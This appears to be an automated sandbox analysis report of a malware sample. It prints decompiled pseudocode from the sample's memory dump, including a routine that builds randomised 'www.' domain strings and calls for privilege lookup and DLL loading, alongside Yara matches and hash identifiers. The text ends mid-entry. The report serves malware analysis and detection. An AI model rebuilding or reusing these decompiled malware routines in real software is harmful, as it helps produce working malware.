                                                  • API String ID: 1836367815-0
                                                  • Opcode ID: 9e39a802d25bf0205d4005b1bd6783377b2ee9f48abcc3171cc4447a97e058b9
                                                  • Instruction ID: a55241834724a4f9522fcddb18cdf12f322e24b5025e529ea1e7499cfe7347ca
                                                  • Opcode Fuzzy Hash: 9e39a802d25bf0205d4005b1bd6783377b2ee9f48abcc3171cc4447a97e058b9
                                                  • Instruction Fuzzy Hash: 88018431A8022876E721BA959C03FFF776C5B00B55F14015AFF04BA1C2E6A8790586FA
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00407263, Relevance: 1.5, APIs: 1, Instructions: 38threadwindowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072EA
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000001.361409947.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: MessagePostThread
                                                  • String ID:
                                                  • API String ID: 1836367815-0
                                                  • Opcode ID: 2c5ab5e332fffdf23ba65a94d8a9c2121684a943267598d725fac98cac4351bc
                                                  • Instruction ID: 574bf865cb3a9c5b0f28379c8701a5991f5030ebe1d1f7c3a8d9e9f1a4985c1d
                                                  • Opcode Fuzzy Hash: 2c5ab5e332fffdf23ba65a94d8a9c2121684a943267598d725fac98cac4351bc
                                                  • Instruction Fuzzy Hash: 8FF0A031B9022432E22119956D03FFB66999B80F11F04006EFF04AA2C1EAA8691542E6
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004188D2, Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 19%
                                                  			E004188D2(signed int __eax, void* __edi, char _a4, void* _a8, long _a12, void* _a16) {
				void* __esi;
				void* __ebp;
				void* _t10;
				void* _t11;
				void* _t12;
				intOrPtr* _t14;

				if((__eax | 0x000000f2) >= 0) {
					_t10 =  *((intOrPtr*)( *_t14))(_t12, _t11); // executed
					return _t10;
				} else {
					asm("std");
					asm("ror byte [ecx+0x55], 0x8b");
					__ebp = __esp;
					__eax = _a4;
					_t3 = __eax + 0xc74; // 0xc74
					__esi = _t3;
					__eax = _a12;
					__eax = RtlFreeHeap(_a8, _a12, _a16); // executed
					__esi = __esi;
					__ebp = __ebp;
					return __eax;
				}
			}









                                                  0x004188d6
                                                  0x00418861
                                                  0x00418865
                                                  0x004188d8
                                                  0x004188d8
                                                  0x004188de
                                                  0x004188e1
                                                  0x004188e3
                                                  0x004188ef
                                                  0x004188ef
                                                  0x004188ff
                                                  0x0041890d
                                                  0x0041890f
                                                  0x00418910
                                                  0x00418911
                                                  0x00418911

                                                  APIs
                                                  • RtlFreeHeap.NTDLL(00000060,00408B23,?,?,00408B23,00000060,00000000,00000000,?,?,00408B23,?,00000000), ref: 0041890D
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000001.361409947.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FreeHeap
                                                  • String ID:
                                                  • API String ID: 3298025750-0
                                                  • Opcode ID: b0d06c5f21200ef33afe594529470be69220bd7c25d57f3c5238cfae6c87fd47
                                                  • Instruction ID: 0e64c00c1ce613f1af75d3174b2d769ea92e3ed21bc24d3472f3b19191c9be4a
                                                  • Opcode Fuzzy Hash: b0d06c5f21200ef33afe594529470be69220bd7c25d57f3c5238cfae6c87fd47
                                                  • Instruction Fuzzy Hash: C9F0E2B12002046FEB18DFA8DC48EEB37A8EF89324F104A4EFD5C87251C231E951CAA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004188E0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E004188E0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				intOrPtr _t7;
				char _t10;
				intOrPtr _t11;
				void* _t15;

				_t7 = _a4;
				_t11 =  *((intOrPtr*)(_t7 + 0x10));
				_t3 = _t7 + 0xc74; // 0xc74
				E004191D0(_t15, _t7, _t3, _t11, 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}







                                                  0x004188e3
                                                  0x004188e6
                                                  0x004188ef
                                                  0x004188f7
                                                  0x0041890d
                                                  0x00418911

                                                  APIs
                                                  • RtlFreeHeap.NTDLL(00000060,00408B23,?,?,00408B23,00000060,00000000,00000000,?,?,00408B23,?,00000000), ref: 0041890D
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000001.361409947.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FreeHeap
                                                  • String ID:
                                                  • API String ID: 3298025750-0
                                                  • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                  • Instruction ID: d5064c9333f2c86e90799a0952281b4505df08c213c274bd60dc18c3aad5e7c3
                                                  • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                  • Instruction Fuzzy Hash: D6E012B1200208ABDB18EF99CC49EA777ACAF88750F018559FE085B242C630E910CAB0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00418A40, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00418A40(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E004191D0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                  0x00418a5a
                                                  0x00418a70
                                                  0x00418a74

                                                  APIs
                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFD2,0040CFD2,00000041,00000000,?,00408B95), ref: 00418A70
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000001.361409947.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LookupPrivilegeValue
                                                  • String ID:
                                                  • API String ID: 3899507212-0
                                                  • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                  • Instruction ID: 94a67e7d56b84cdac76e00d2984c4843b75a07e867f03accef92050f0623a7c7
                                                  • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                  • Instruction Fuzzy Hash: 2AE01AB12002086BDB14DF49CC85EE737ADAF88650F018155FE0857241C934E8508BF5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00418920, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00418920(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E004191D0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                                                  0x00418923
                                                  0x0041893a
                                                  0x00418948

                                                  APIs
                                                  • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418948
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000001.361409947.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExitProcess
                                                  • String ID:
                                                  • API String ID: 621844428-0
                                                  • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                  • Instruction ID: e5768b9f518b8de78fd4a208f412dfdc851767aa697c2aafb91b43477ac04d56
                                                  • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                  • Instruction Fuzzy Hash: 99D012716002187BD624DB99CC89FD7779CDF48790F058065BA1C5B241C571BA00C6E1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00409B43, Relevance: 1.5, APIs: 1, Instructions: 15libraryloaderCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 61%
                                                  			E00409B43(void* __eax, void* __edi, intOrPtr _a4, signed char _a8, signed int _a1783756877) {
				char* _v8;
				char _v12;
				intOrPtr _v16;
				char _v536;
				signed int _v1957628859;
				char _t19;
				void* _t22;
				intOrPtr _t24;
				signed char _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				WCHAR* _t34;
				WCHAR* _t37;
				void* _t40;
				void* _t41;

				if(__eax != 0xd0) {
					L8:
					_v1957628859 = _v1957628859 | _t26;
					_t29 = _t28 + 1;
					_a1783756877 = _a1783756877 | _t26;
					 *_t29 =  *_t29 + _t26; // executed
					__eflags =  *_t29;
					LdrLoadDll(_t34); // executed
					_t19 = _v12;
					goto L9;
				} else {
					asm("ror dword [eax-0x4], cl");
					_push(_t34);
					_t34 = _t37;
					_t26 = _a8;
					_v8 =  &_v536;
					_t22 = E0041AF60( &_v12, 0x104, _t26);
					_t40 = _t37 - 0x214 + 0xc;
					if(_t22 != 0) {
						_t24 = E0041B380(__eflags, _v8);
						_t41 = _t40 + 4;
						__eflags = _t24;
						if(_t24 != 0) {
							_t26 =  &_v12;
							E0041B600(_t26, 0);
							_t41 = _t41 + 8;
						}
						_t19 = E00419710(_v8);
						_v16 = _t19;
						__eflags = _t19;
						if(_t19 == 0) {
							_t28 = _a4;
							goto L8;
						}
						L9:
						return _t19;
					} else {
						return _t22;
					}
				}
			}


















                                                  0x00409b45
                                                  0x00409bb1
                                                  0x00409bb2
                                                  0x00409bb8
                                                  0x00409bb9
                                                  0x00409bbf
                                                  0x00409bbf
                                                  0x00409bc2
                                                  0x00409bc4
                                                  0x00000000
                                                  0x00409b47
                                                  0x00409b4c
                                                  0x00409b50
                                                  0x00409b51
                                                  0x00409b59
                                                  0x00409b6c
                                                  0x00409b6f
                                                  0x00409b74
                                                  0x00409b79
                                                  0x00409b83
                                                  0x00409b88
                                                  0x00409b8b
                                                  0x00409b8d
                                                  0x00409b8f
                                                  0x00409b95
                                                  0x00409b9a
                                                  0x00409b9a
                                                  0x00409ba1
                                                  0x00409ba9
                                                  0x00409bac
                                                  0x00409bae
                                                  0x00409bb0
                                                  0x00000000
                                                  0x00409bb0
                                                  0x00409bc7
                                                  0x00409bca
                                                  0x00409b7b
                                                  0x00409b7e
                                                  0x00409b7e
                                                  0x00409b79

                                                  APIs
                                                  • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BC2
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000001.361409947.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Load
                                                  • String ID:
                                                  • API String ID: 2234796835-0
                                                  • Opcode ID: cf23d729a162f742a8e542a34e292f8dc0cb694e795ac33ecf25a9c0e5e37b97
                                                  • Instruction ID: bd36785a63b5dc3618b1c6c9b11c643d3e4f328dc2672cff3bea5a4d5f7cacde
                                                  • Opcode Fuzzy Hash: cf23d729a162f742a8e542a34e292f8dc0cb694e795ac33ecf25a9c0e5e37b97
                                                  • Instruction Fuzzy Hash: 5BD0A72050E2887FDB25C65C681585DFF64EF91120B04C6EEC889AB2C3C2305A098782
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 009F967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.426022117.0000000000990000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 80258d98bd947ca51538fa41305977987f3915d7e5b62cefa6cfc7037a825be6
                                                  • Instruction ID: d5bc6bcb50bb5772c930fdf6b442db1d0650c5cde8c41e6c6c63b9a57e37c390
                                                  • Opcode Fuzzy Hash: 80258d98bd947ca51538fa41305977987f3915d7e5b62cefa6cfc7037a825be6
                                                  • Instruction Fuzzy Hash: 49B09B729014C9C5E711D7B156087277A047BD0745F16C061D2024645A4778C491F6B5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Non-executed Functions

                                                  Function 004162C4, Relevance: 4.1, Strings: 3, Instructions: 309COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 87%
                                                  			E004162C4(void* __eax, void* __ebx, void* __ecx, void* __edx) {
				signed char _t125;
				char _t128;
				signed char _t135;
				void* _t138;
				signed int _t143;
				intOrPtr _t158;
				intOrPtr _t201;
				void* _t206;
				signed int _t207;
				void* _t260;
				signed int _t263;
				intOrPtr _t264;
				void* _t267;
				void* _t268;
				void* _t271;
				void* _t272;
				void* _t275;

				asm("pushad");
				asm("sbb eax, 0x25c7a78f");
				asm("out 0x68, eax");
				asm("fild word [esi-0x12019e59]");
				asm("cmpsb");
				_t206 = __ecx - 1;
				_t125 = __eax - _t206;
				if( *((intOrPtr*)(_t206 + _t206)) <= _t267) {
					_t268 = _t267 + 1;
					__eflags = _t125 & 0x00000000;
					E0041A130();
					_t272 = _t271 + 0xc;
					 *((char*)(_t268 - 0x10)) = 0;
					 *((intOrPtr*)(_t268 - 0xf)) = 0;
					 *((short*)(_t268 - 0xb)) = 0;
					 *((char*)(_t268 - 9)) = 0;
					_t263 = 0;
					__eflags = 0;
					do {
						_t128 = E004092B0(0x53, 0x92);
						_t272 = _t272 + 8;
						_t207 = 0;
						__eflags = 0;
						while(1) {
							__eflags = _t128 -  *((intOrPtr*)(_t268 + _t207 - 0x10));
							if(_t128 ==  *((intOrPtr*)(_t268 + _t207 - 0x10))) {
								goto L8;
							}
							_t207 = _t207 + 1;
							__eflags = _t207 - _t263;
							if(_t207 <= _t263) {
								continue;
							} else {
								__eflags = _t128;
								if(_t128 != 0) {
									 *((char*)(_t268 + _t263 - 0x10)) = _t128;
									_t263 = _t263 + 1;
									__eflags = _t263;
								}
							}
							goto L8;
						}
						L8:
						__eflags = _t263 - 8;
					} while (_t263 < 8);
					 *((intOrPtr*)(_t268 - 8)) = 0x2e777777;
					 *((char*)(_t268 - 4)) = 0;
					 *((short*)(_t268 - 3)) = 0;
					 *((char*)(_t268 - 1)) = 0;
					 *((char*)(_t268 - 0x98)) = 0;
					E0041A130(_t268 - 0x97, 0, 0x3f);
					E0041AA20(_t268 - 0x98, E004092B0(2, 5) & 0x000000ff);
					 *((char*)(_t268 + E0041A380(_t268 - 0x98) - 0x98)) = 0x3d;
					_t135 = E004092B0(4, 0x10);
					_t138 = E0041AA20(_t268 + E0041A380(_t268 - 0x98) - 0x98, _t135 & 0x000000ff);
					_t25 = _t268 + 8; // 0x2e777777
					_t264 =  *_t25;
					_t201 = 0;
					_t275 = _t272 + 0x34;
					 *((intOrPtr*)(_t268 - 0x14)) = 0;
					_t260 = 0;
					do {
						__eflags =  *((intOrPtr*)(_t264 + 0x1170)) - _t201;
						if( *((intOrPtr*)(_t264 + 0x1170)) != _t201) {
							E0041A0E0(_t268 - 0x58, 0x2e);
							 *((short*)(_t268 - 0x308)) = 0;
							E0041A130(_t268 - 0x306, 0, 0x206);
							E0041A0E0( *((intOrPtr*)(_t264 + 0x14a4)) + _t260, 0x388);
							_t143 = E0041A6A0();
							_t33 = _t201 - 1; // -1
							 *( *((intOrPtr*)(_t264 + 0x14a4)) + _t260 + 0x40) = _t143 * _t33 & 0x00000001;
							E0041A0B0( *((intOrPtr*)(_t264 + 0x14a4)) + _t260 + 0x87, _t268 - 0x98, E0041A380(_t268 - 0x98));
							_t41 = _t268 - 8; // 0x2e777777
							E0041A0B0(_t268 - 0x58, _t41, 4);
							_push(4);
							E00409E10(_t201, _t264, __eflags, _t264, _t268 + E0041A380(_t268 - 0x58) - 0x58,  *(_t268 + _t201 - 0x10) & 0x000000ff);
							E0041A0B0( *((intOrPtr*)(_t264 + 0x14a4)) + _t260, _t268 - 0x58, E0041A380(_t268 - 0x58));
							_t158 = E0041A380(_t268 - 0x58);
							_t203 = _t264 + 0xe90;
							 *((intOrPtr*)(_t268 - 0x18)) = _t158;
							E0041A4B0(_t268 - 0x58, _t264 + 0xe90, 0);
							E00408C50(_t268 - 0x100);
							E004099D0(_t268 - 0x100, _t268 - 0x58, E0041A380(_t268 - 0x58));
							E004099A0(_t268 - 0x100);
							E0041A0B0( *((intOrPtr*)(_t264 + 0x14a4)) + _t260 + 0x72, _t268 - 0x100, 0x14);
							 *((char*)(_t268 +  *((intOrPtr*)(_t268 - 0x18)) - 0x58)) = 0;
							 *((intOrPtr*)( *((intOrPtr*)(_t264 + 0x14a4)) + _t260 + 0x4c)) = 2;
							 *((intOrPtr*)( *((intOrPtr*)(_t264 + 0x14a4)) + _t260 + 0x50)) = 1;
							E00409EA0(_t264 + 0xe90, _t264, __eflags, _t264, _t268 - 0x308, 0x46, 1);
							E0041A750( *((intOrPtr*)(_t264 + 0x14a4)) + _t260 + 0xc7, _t268 - 0x308);
							E00409EA0(_t264 + 0xe90, _t264, __eflags, _t264, _t268 - 0x308, 0x47, 1);
							E0041A750(E0041A380( *((intOrPtr*)(_t264 + 0x14a4)) + _t260 + 0xc7) +  *((intOrPtr*)(_t264 + 0x14a4)) + _t260 + 0xc7, _t268 - 0x308);
							E0041A4B0( *((intOrPtr*)(_t264 + 0x14a4)) + _t260 + 0xc7, _t268 - 0x58, 0);
							E00409EA0(_t203, _t264, __eflags, _t264, _t268 - 0x308, 0x4a, 1);
							E0041A750( *((intOrPtr*)(_t264 + 0x14a4)) + _t260 + 0x167, _t268 - 0x308);
							E00409EA0(_t203, _t264, __eflags, _t264, _t268 - 0x308, 0x4b, 1);
							E0041A750(E0041A380( *((intOrPtr*)(_t264 + 0x14a4)) + _t260 + 0x167) +  *((intOrPtr*)(_t264 + 0x14a4)) + _t260 + 0x167, _t268 - 0x308);
							E0041A4B0( *((intOrPtr*)(_t264 + 0x14a4)) + _t260 + 0x167, _t268 - 0x58, 0);
							E00409EA0(_t203, _t264, __eflags, _t264, _t268 - 0x308, 0x4f, 1);
							__eflags = E0041A380( *((intOrPtr*)(_t264 + 0x14a4)) + _t260 + 0x287) +  *((intOrPtr*)(_t264 + 0x14a4));
							E0041A750(E0041A380( *((intOrPtr*)(_t264 + 0x14a4)) + _t260 + 0x287) +  *((intOrPtr*)(_t264 + 0x14a4)) + _t260 + 0x287, _t268 - 0x308);
							E0041A4B0( *((intOrPtr*)(_t264 + 0x14a4)) + _t260 + 0x287, _t268 - 0x58, 0);
							_t138 = E0041A4B0( *((intOrPtr*)(_t264 + 0x14a4)) + _t260 + 0x287, _t203, 0);
							_t201 =  *((intOrPtr*)(_t268 - 0x14));
							_t275 = _t275 + 0x144;
						}
						_t201 = _t201 + 1;
						_t260 = _t260 + 0x388;
						 *((intOrPtr*)(_t268 - 0x14)) = _t201;
						__eflags = _t260 - 0x1c40;
					} while (_t260 < 0x1c40);
					return _t138;
				} else {
					return _t125 - 1;
				}
			}




















                                                  0x004162c4
                                                  0x004162c5
                                                  0x004162cb
                                                  0x004162cf
                                                  0x004162d5
                                                  0x004162d6
                                                  0x004162d7
                                                  0x004162dc
                                                  0x00416305
                                                  0x00416306
                                                  0x00416308
                                                  0x0041630f
                                                  0x00416312
                                                  0x00416316
                                                  0x00416319
                                                  0x0041631d
                                                  0x00416320
                                                  0x00416320
                                                  0x00416322
                                                  0x00416329
                                                  0x0041632e
                                                  0x00416331
                                                  0x00416331
                                                  0x00416333
                                                  0x00416333
                                                  0x00416337
                                                  0x00000000
                                                  0x00000000
                                                  0x00416339
                                                  0x0041633a
                                                  0x0041633c
                                                  0x00000000
                                                  0x0041633e
                                                  0x0041633e
                                                  0x00416340
                                                  0x00416342
                                                  0x00416346
                                                  0x00416346
                                                  0x00416346
                                                  0x00416340
                                                  0x00000000
                                                  0x0041633c
                                                  0x00416347
                                                  0x00416347
                                                  0x00416347
                                                  0x00416358
                                                  0x0041635f
                                                  0x00416363
                                                  0x00416367
                                                  0x0041636a
                                                  0x00416370
                                                  0x00416389
                                                  0x0041639e
                                                  0x004163a6
                                                  0x004163c9
                                                  0x004163ce
                                                  0x004163ce
                                                  0x004163d1
                                                  0x004163d3
                                                  0x004163d6
                                                  0x004163d9
                                                  0x004163e0
                                                  0x004163e0
                                                  0x004163e6
                                                  0x004163f2
                                                  0x00416406
                                                  0x0041640d
                                                  0x00416420
                                                  0x00416425
                                                  0x00416430
                                                  0x00416439
                                                  0x0041645f
                                                  0x00416466
                                                  0x0041646e
                                                  0x0041647b
                                                  0x00416490
                                                  0x004164ac
                                                  0x004164b5
                                                  0x004164bc
                                                  0x004164c7
                                                  0x004164ca
                                                  0x004164d6
                                                  0x004164f0
                                                  0x004164ff
                                                  0x00416518
                                                  0x00416526
                                                  0x00416535
                                                  0x00416545
                                                  0x0041654d
                                                  0x00416567
                                                  0x00416578
                                                  0x004165ab
                                                  0x004165c4
                                                  0x004165d5
                                                  0x004165ef
                                                  0x00416600
                                                  0x00416633
                                                  0x0041664c
                                                  0x0041665d
                                                  0x0041667f
                                                  0x00416690
                                                  0x004166a9
                                                  0x004166bf
                                                  0x004166c4
                                                  0x004166c7
                                                  0x004166c7
                                                  0x004166ca
                                                  0x004166cb
                                                  0x004166d1
                                                  0x004166d4
                                                  0x004166d4
                                                  0x004166e6
                                                  0x004162de
                                                  0x004162e9
                                                  0x004162e9

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.425753060.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: =$www.$www.
                                                  • API String ID: 0-3343787489
                                                  • Opcode ID: 73814bf4e719de51a9cfaff285d9e4ffe9f105650208ebdc455f383059ee60ac
                                                  • Instruction ID: 9c247b9d6cf6bf096c2a9d86ec6e1778e41a3057b207ffac2e27cf033451d30a
                                                  • Opcode Fuzzy Hash: 73814bf4e719de51a9cfaff285d9e4ffe9f105650208ebdc455f383059ee60ac
                                                  • Instruction Fuzzy Hash: 66B1D671951204ABCB14DBB0CC82FDFB37CAF44318F44455EF6595B183DA78A688CBAA
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00415854, Relevance: .0, Instructions: 11COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.425753060.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5d7ea7ffef9b660f72df0cab688bc74c2acdc24fe1b7df5b6a2ca324be5cd2f0
                                                  • Instruction ID: a0f26482416ee822295d4994f74519ab151bad0fbfbbce22459268195ef1c3bd
                                                  • Opcode Fuzzy Hash: 5d7ea7ffef9b660f72df0cab688bc74c2acdc24fe1b7df5b6a2ca324be5cd2f0
                                                  • Instruction Fuzzy Hash: 7AA0022BF9B014049E641C8D7C414F6E378D5C327BE303273D60CB38100002C05611AD
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 009F98A0, Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.426022117.0000000000990000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b52382dff748f8e6de32bbc9db9717af463ee23af34eca078d6a91a1e9513e11
                                                  • Instruction ID: 39de21939dd797bbac470447d528d77f95684544cf9104cc35b9028be67d0f98
                                                  • Opcode Fuzzy Hash: b52382dff748f8e6de32bbc9db9717af463ee23af34eca078d6a91a1e9513e11
                                                  • Instruction Fuzzy Hash: 3B90026230100802E20261A954246060009D7D1385F91C022E1414559D86A58953F172
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 009F9820, Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.426022117.0000000000990000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7185ab57981a8ac484e210e08e6752bf88b814f084d6a25999b444f3dd10ee8e
                                                  • Instruction ID: 01212465157b43f07d4d80f525dd501b6a0f54850898f5af8c3b0f8ba13163b9
                                                  • Opcode Fuzzy Hash: 7185ab57981a8ac484e210e08e6752bf88b814f084d6a25999b444f3dd10ee8e
                                                  • Instruction Fuzzy Hash: 8A90027224100802E24171A954146060009A7D0381F91C022A0414558E86D58A56FAA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 009FB040, Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.426022117.0000000000990000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d6b5c8495f0996b64c2461a2ee750085914d3699a1a8db3fb201e72410d0dbcb
                                                  • Instruction ID: 5ee129b47e7715a07cdc56fa1abd4ecb8bd952d4d46431ea766d213c0eff94d4
                                                  • Opcode Fuzzy Hash: d6b5c8495f0996b64c2461a2ee750085914d3699a1a8db3fb201e72410d0dbcb
                                                  • Instruction Fuzzy Hash: 009002A2601144439640B1A958144065015A7E1341391C131A0444564C86E88855E2A5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 009F99D0, Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.426022117.0000000000990000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 879f6cc0f2ca7fb1ef1e821dd7726d8dfff074116e13d940eb260316bdca192c
                                                  • Instruction ID: e65407851792f9b059192e257a78592cd022f1cc83f52810636a68673eb13a82
                                                  • Opcode Fuzzy Hash: 879f6cc0f2ca7fb1ef1e821dd7726d8dfff074116e13d940eb260316bdca192c
                                                  • Instruction Fuzzy Hash: F49002A221100442E20461A95414706004597E1341F51C022A2144558CC5A98C61A165
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 009F95F0, Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.426022117.0000000000990000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 81574113330f6d624467624396879ff9ea6680f2d79d590f44e42298c131ea92
                                                  • Instruction ID: 65090bea8ccb24599feca9f7e75ffdf5c325c21f30a650be23c75f926eb463a9
                                                  • Opcode Fuzzy Hash: 81574113330f6d624467624396879ff9ea6680f2d79d590f44e42298c131ea92
                                                  • Instruction Fuzzy Hash: 4690027220100C02E20461A95814686000597D0341F51C021A6014659E96E58891B171
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 009FAD30, Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.426022117.0000000000990000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 693611c8ac51f5d2e047113b6b3aaf4fb45e0f290b10477b21dedd47bfc27e1f
                                                  • Instruction ID: 77ddc2a718200b52279afd2c62114c7e5548bdeaf8858e1a2f0d34ffe76f7aa8
                                                  • Opcode Fuzzy Hash: 693611c8ac51f5d2e047113b6b3aaf4fb45e0f290b10477b21dedd47bfc27e1f
                                                  • Instruction Fuzzy Hash: 4F900272A0500412E24071A958246464006A7E0781B55C021A0504558C89D48A55A3E1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 009F9520, Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.426022117.0000000000990000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e8f3096919238325cb65e76407bde3d0d13994a55e6a9334351d9d301fbfeaf6
                                                  • Instruction ID: fb9b42e03b033998144eceda42239f5532c0ff0ecb353384ba0f1cef5d8e957a
                                                  • Opcode Fuzzy Hash: e8f3096919238325cb65e76407bde3d0d13994a55e6a9334351d9d301fbfeaf6
                                                  • Instruction Fuzzy Hash: 389002E2201144929600A2A99414B0A450597E0341B51C026E1044564CC5A58851E175
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 009F9950, Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.426022117.0000000000990000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 248be6d024d9b6cf30ab4ea81adcba6b3d27e2e3470e0fe668c46e2178c548e5
                                                  • Instruction ID: f7e83700fede1586755e7348d2cfc3d96f781ffde0cfd2a139ef69c1a038604f
